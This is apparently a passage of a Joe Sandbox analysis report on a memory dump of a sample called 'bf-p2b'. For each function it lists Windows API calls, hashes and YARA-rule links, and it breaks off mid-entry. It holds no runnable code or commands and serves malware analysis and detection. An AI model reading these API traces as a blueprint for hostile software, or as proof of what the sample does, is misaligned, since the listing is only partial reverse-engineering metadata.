                            • Part of subcall function 00B07E53: _memmove.LIBCMT ref: 00B07EB9
                          • _memset.LIBCMT ref: 00B03965
                          • _wcscpy.LIBCMT ref: 00B039B5
                          • Shell_NotifyIconW.SHELL32(00000001,?), ref: 00B039C6
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                          • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: IconLoadNotifyShell_String_memmove_memset_wcscpy
                          • String ID: Line:
                          • API String ID: 3942752672-1585850449
                          • Opcode ID: d8182ed7dd5671f7de4ef08c05d84f055304bee3637e545365359104b95f6dd6
                          • Instruction ID: a9f13eaa00a9c731eda8ca0958dea3d71e518c714f1c48c6bcdb9d863ea0ad6a
                          • Opcode Fuzzy Hash: d8182ed7dd5671f7de4ef08c05d84f055304bee3637e545365359104b95f6dd6
                          • Instruction Fuzzy Hash: 6E31A171408340ABD721EB64DC49FDB7BECEB59710F44499AF18A931E1DF70AA48CB92
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00B68EEF Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 80windowlibraryCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 00B1C619: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00B1C657
                            • Part of subcall function 00B1C619: GetStockObject.GDI32(00000011), ref: 00B1C66B
                            • Part of subcall function 00B1C619: SendMessageW.USER32(00000000,00000030,00000000), ref: 00B1C675
                          • SendMessageW.USER32(00000000,00000467,00000000,?), ref: 00B68F69
                          • LoadLibraryW.KERNEL32(?), ref: 00B68F70
                          • SendMessageW.USER32(?,00000467,00000000,00000000), ref: 00B68F85
                          • DestroyWindow.USER32(?), ref: 00B68F8D
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                          • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: MessageSend$Window$CreateDestroyLibraryLoadObjectStock
                          • String ID: SysAnimate32
                          • API String ID: 4146253029-1011021900
                          • Opcode ID: 977b14b5aead96236005a3242193907333439d9e71f47c8991d4c061ddd20fe5
                          • Instruction ID: 7cd2e48feedf9f3a82181e8b86367072595bddcb06423254ba88167ae73d03f2
                          • Opcode Fuzzy Hash: 977b14b5aead96236005a3242193907333439d9e71f47c8991d4c061ddd20fe5
                          • Instruction Fuzzy Hash: F0219D71200205AFEF105E64DC90EBB3BEAEB59324F104B69FA54971A1DB75DC5097A0
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00B49E65 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 78filepipeCOMMON
                          Download Yara Rule
                          APIs
                          • GetStdHandle.KERNEL32(0000000C), ref: 00B49E85
                          • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00B49EB6
                          • GetStdHandle.KERNEL32(0000000C), ref: 00B49EC8
                          • CreateFileW.KERNEL32(nul,40000000,00000002,0000000C,00000003,00000080,00000000), ref: 00B49F02
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                          • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: CreateHandle$FilePipe
                          • String ID: nul
                          • API String ID: 4209266947-2873401336
                          • Opcode ID: 5f291686565f4c1e53227dd061f84644785c29c59e3e31cd0227715eee59af5d
                          • Instruction ID: 71102c0b5f7de29fd75175d36316cbf29c5788d852bb3a1c18c0a43c61b0d961
                          • Opcode Fuzzy Hash: 5f291686565f4c1e53227dd061f84644785c29c59e3e31cd0227715eee59af5d
                          • Instruction Fuzzy Hash: B3215E70640305ABDB20DF29DC45A9B7BF4EF84720F204A99F8A5D72E0DB70DA48EB50
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00B4E382 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 71COMMON
                          Download Yara Rule
                          APIs
                          • SetErrorMode.KERNEL32(00000001), ref: 00B4E392
                          • GetVolumeInformationW.KERNEL32(?,?,00000104,?,00000000,00000000,00000000,00000000), ref: 00B4E3E6
                          • __swprintf.LIBCMT ref: 00B4E3FF
                          • SetErrorMode.KERNEL32(00000000,00000001,00000000,00B9DBF0), ref: 00B4E43D
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                          • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: ErrorMode$InformationVolume__swprintf
                          • String ID: %lu
                          • API String ID: 3164766367-685833217
                          • Opcode ID: cb735c0ff7489a61b96c6c2f254d7643b6c8490e16b8346eeb5883aca84f4866
                          • Instruction ID: b63bf0537663e15106c3bce3c4c7f3d36b91bc23c02bba162b1e6fb6ca0f96ab
                          • Opcode Fuzzy Hash: cb735c0ff7489a61b96c6c2f254d7643b6c8490e16b8346eeb5883aca84f4866
                          • Instruction Fuzzy Hash: 2F216D35A40108AFCB10EFA4C885EAEBBF8EF49710B1040A9F509E72A1DB31DA05CB60
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00B3D7D6 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 67windowCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 00B07E53: _memmove.LIBCMT ref: 00B07EB9
                            • Part of subcall function 00B3D623: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 00B3D640
                            • Part of subcall function 00B3D623: GetWindowThreadProcessId.USER32(?,00000000), ref: 00B3D653
                            • Part of subcall function 00B3D623: GetCurrentThreadId.KERNEL32 ref: 00B3D65A
                            • Part of subcall function 00B3D623: AttachThreadInput.USER32(00000000), ref: 00B3D661
                          • GetFocus.USER32 ref: 00B3D7FB
                            • Part of subcall function 00B3D66C: GetParent.USER32(?), ref: 00B3D67A
                          • GetClassNameW.USER32(?,?,00000100), ref: 00B3D844
                          • EnumChildWindows.USER32(?,00B3D8BA), ref: 00B3D86C
                          • __swprintf.LIBCMT ref: 00B3D886
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                          • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: Thread$AttachChildClassCurrentEnumFocusInputMessageNameParentProcessSendTimeoutWindowWindows__swprintf_memmove
                          • String ID: %s%d
                          • API String ID: 1941087503-1110647743
                          • Opcode ID: a938018a1bcda1620c411927d0cf430a7efec90ee3c11b8cfc448c5e59b3a46a
                          • Instruction ID: 834a3e093cbaec8ca1776af7c08c53e2ebfe64b3ce71856be5defbf23fd6b8ae
                          • Opcode Fuzzy Hash: a938018a1bcda1620c411927d0cf430a7efec90ee3c11b8cfc448c5e59b3a46a
                          • Instruction Fuzzy Hash: 1211A2719002096BDF11BF60EC86FEA37ADAB44704F1040F6B919AA196DFB4A945CB70
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00B5BAE6 Relevance: 7.9, APIs: 5, Instructions: 419COMMON
                          Download Yara Rule
                          APIs
                          • GetModuleFileNameW.KERNEL32(?,?,00000104,?,00B9DBF0), ref: 00B5BBA1
                          • FreeLibrary.KERNEL32(00000000,00000001,00000000,?,00B9DBF0), ref: 00B5BBD5
                          • QueryPathOfRegTypeLib.OLEAUT32(?,?,?,?,?), ref: 00B5BD33
                          • SysFreeString.OLEAUT32(?), ref: 00B5BD5D
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                          • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: Free$FileLibraryModuleNamePathQueryStringType
                          • String ID:
                          • API String ID: 560350794-0
                          • Opcode ID: 1b2466731fd436c608ccfbb3d94904f55d804ec7b9630ee7ad3765ff7c54b94b
                          • Instruction ID: c66953a50c6b6e7bb42ea54ba395a26c2eacf1203eb969d6aacb6a095e34a2ba
                          • Opcode Fuzzy Hash: 1b2466731fd436c608ccfbb3d94904f55d804ec7b9630ee7ad3765ff7c54b94b
                          • Instruction Fuzzy Hash: D6F10775A00209EFCB04DFA4C884EAEB7B9FF89315F1485D9F905AB250DB71AE46CB50
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00B61836 Relevance: 7.7, APIs: 5, Instructions: 232COMMON
                          Download Yara Rule
                          APIs
                          • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 00B618E4
                          • GetProcessIoCounters.KERNEL32(00000000,?), ref: 00B61917
                          • GetProcessMemoryInfo.PSAPI(00000000,?,00000028), ref: 00B61A3A
                          • CloseHandle.KERNEL32(?), ref: 00B61AB0
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                          • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: Process$CloseCountersHandleInfoMemoryOpen
                          • String ID:
                          • API String ID: 2364364464-0
                          • Opcode ID: f7be954159d96cd9cbb733d3d6574fc83b092ddc71c8e71f0e987cbaf5973cf0
                          • Instruction ID: b4c65a8122c95514905eb406e592fd413d9af18828f9258e00b35da32f45e405
                          • Opcode Fuzzy Hash: f7be954159d96cd9cbb733d3d6574fc83b092ddc71c8e71f0e987cbaf5973cf0
                          • Instruction Fuzzy Hash: E6817174A41204ABDF109F68C886BAD7BE5EF44720F588499F915AF3C2D7B8E9408F90
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00B60579 Relevance: 7.6, APIs: 5, Instructions: 149libraryloaderCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 00B084A6: __swprintf.LIBCMT ref: 00B084E5
                            • Part of subcall function 00B084A6: __itow.LIBCMT ref: 00B08519
                          • LoadLibraryW.KERNEL32(?,00000004,?,?), ref: 00B605DF
                          • GetProcAddress.KERNEL32(00000000,?), ref: 00B6066E
                          • GetProcAddress.KERNEL32(00000000,00000000), ref: 00B6068C
                          • GetProcAddress.KERNEL32(00000000,?), ref: 00B606D2
                          • FreeLibrary.KERNEL32(00000000,00000004), ref: 00B606EC
                            • Part of subcall function 00B1F26B: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,00B4AEA5,?,?,00000000,00000008), ref: 00B1F282
                            • Part of subcall function 00B1F26B: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?,00B4AEA5,?,?,00000000,00000008), ref: 00B1F2A6
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                          • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad__itow__swprintf
                          • String ID:
                          • API String ID: 327935632-0
                          • Opcode ID: 822265c2707d823009733688cfe63cc6e54ec003a289c74d0916d49ca8d8d10b
                          • Instruction ID: caef21b03735d6614bec07b98a7f53e5fa12fe776eeb8b99596f37bbd77f83a5
                          • Opcode Fuzzy Hash: 822265c2707d823009733688cfe63cc6e54ec003a289c74d0916d49ca8d8d10b
                          • Instruction Fuzzy Hash: CF515C75A00205DFCB00EFA8C4949AEBBF5FF58310B1481A5E956AB392DB34ED45CF91
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00B62D1A Relevance: 7.6, APIs: 5, Instructions: 144registryCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 00B0CAEE: _memmove.LIBCMT ref: 00B0CB2F
                            • Part of subcall function 00B63AF7: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00B62AA6,?,?), ref: 00B63B0E
                          • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00B62DE0
                          • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00B62E1F
                          • RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 00B62E66
                          • RegCloseKey.ADVAPI32(?,?), ref: 00B62E92
                          • RegCloseKey.ADVAPI32(00000000), ref: 00B62E9F
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                          • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: Close$BuffCharConnectEnumOpenRegistryUpper_memmove
                          • String ID:
                          • API String ID: 3440857362-0
                          • Opcode ID: e7cf44deeb294b8a3a640f32e8a6ae500c8b826a178191a7397dc569e85fa799
                          • Instruction ID: f8e62a176732fafa6f2e922b6fb4efaaf567b954e818f9c2393719f3f0b2f32c
                          • Opcode Fuzzy Hash: e7cf44deeb294b8a3a640f32e8a6ae500c8b826a178191a7397dc569e85fa799
                          • Instruction Fuzzy Hash: C3518D71204204AFD704EF64C891E6FBBE8FF88304F0449AEF595872A1DB35E905CB52
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00B6CB07 Relevance: 7.6, APIs: 5, Instructions: 129COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                          • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: a99ea8394863be56998136ac7f9b0e5a0acf05f8b25c81e1cdea8be78926edb6
                          • Instruction ID: 74ddc2ddf33c9005d030d0e7f5a19965f92aec5313b81d6b765c7e122c6500c8
                          • Opcode Fuzzy Hash: a99ea8394863be56998136ac7f9b0e5a0acf05f8b25c81e1cdea8be78926edb6
                          • Instruction Fuzzy Hash: 8341C735904108AFD724DF68CC45FB9BFE5EB0A320F194296F999A72E1CB789D01DB90
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00B51726 Relevance: 7.6, APIs: 5, Instructions: 127COMMON
                          Download Yara Rule
                          APIs
                          • GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 00B517D4
                          • GetPrivateProfileSectionW.KERNEL32(?,00000001,00000003,?), ref: 00B517FD
                          • WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 00B5183C
                            • Part of subcall function 00B084A6: __swprintf.LIBCMT ref: 00B084E5
                            • Part of subcall function 00B084A6: __itow.LIBCMT ref: 00B08519
                          • WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 00B51861
                          • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 00B51869
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                          • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: PrivateProfile$SectionWrite$String$__itow__swprintf
                          • String ID:
                          • API String ID: 1389676194-0
                          • Opcode ID: 7cade6f123db03dbdb9376f5eb67343251c645cd8d3789bfa01e4611e5a79771
                          • Instruction ID: 5c5be56e9caa8dc4e42b4cb0f36b068bf449a1be6d7d9a05defd112b707b2536
                          • Opcode Fuzzy Hash: 7cade6f123db03dbdb9376f5eb67343251c645cd8d3789bfa01e4611e5a79771
                          • Instruction Fuzzy Hash: DE411A75A00205DFCB11EF65C981AADBBF5EF08310B1480D9E849AB3A1DB31EE51DF61
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00B1B736 Relevance: 7.6, APIs: 5, Instructions: 110keyboardCOMMON
                          Download Yara Rule
                          APIs
                          • GetCursorPos.USER32(000000FF), ref: 00B1B749
                          • ScreenToClient.USER32(00000000,000000FF), ref: 00B1B766
                          • GetAsyncKeyState.USER32(00000001), ref: 00B1B78B
                          • GetAsyncKeyState.USER32(00000002), ref: 00B1B799
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                          • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: AsyncState$ClientCursorScreen
                          • String ID:
                          • API String ID: 4210589936-0
                          • Opcode ID: 479ff85bca7ae43bb64e86263e38e9e60db3b3d97f15dea97c8ceb8e9f22a95b
                          • Instruction ID: ab75dff198ec8648552566fbb5047b62315f9c102128e4f1e368aa8b5e181293
                          • Opcode Fuzzy Hash: 479ff85bca7ae43bb64e86263e38e9e60db3b3d97f15dea97c8ceb8e9f22a95b
                          • Instruction Fuzzy Hash: 5A411D35504119BBDB159F64C884EE9BBB4FF49364F1083AAF839962D0CB30AD90DB91
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00B3C145 Relevance: 7.6, APIs: 5, Instructions: 88sleepwindowCOMMON
                          Download Yara Rule
                          APIs
                          • GetWindowRect.USER32(?,?), ref: 00B3C156
                          • PostMessageW.USER32(?,00000201,00000001), ref: 00B3C200
                          • Sleep.KERNEL32(00000000,?,00000201,00000001,?,?,?), ref: 00B3C208
                          • PostMessageW.USER32(?,00000202,00000000), ref: 00B3C216
                          • Sleep.KERNEL32(00000000,?,00000202,00000000,?,?,00000201,00000001,?,?,?), ref: 00B3C21E
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                          • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: MessagePostSleep$RectWindow
                          • String ID:
                          • API String ID: 3382505437-0
                          • Opcode ID: 88b3cc2f6592400eae78c9eecaf6b1293c0e09a457f04946e84bb90c98c327a1
                          • Instruction ID: ab47fd14b73e3c4a20a337732c2a39608ad4dc6982cd5c3763c00df1f8b3d31f
                          • Opcode Fuzzy Hash: 88b3cc2f6592400eae78c9eecaf6b1293c0e09a457f04946e84bb90c98c327a1
                          • Instruction Fuzzy Hash: 7631BC71500619EBDB04DFA8DD4CA9E3FB5EF04325F204269F920BB1E1C7B09904EB90
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00B3E9B5 Relevance: 7.6, APIs: 5, Instructions: 87windowCOMMON
                          Download Yara Rule
                          APIs
                          • IsWindowVisible.USER32(?), ref: 00B3E9CD
                          • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 00B3E9EA
                          • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 00B3EA22
                          • CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 00B3EA48
                          • _wcsstr.LIBCMT ref: 00B3EA52
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                          • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmpDownload File
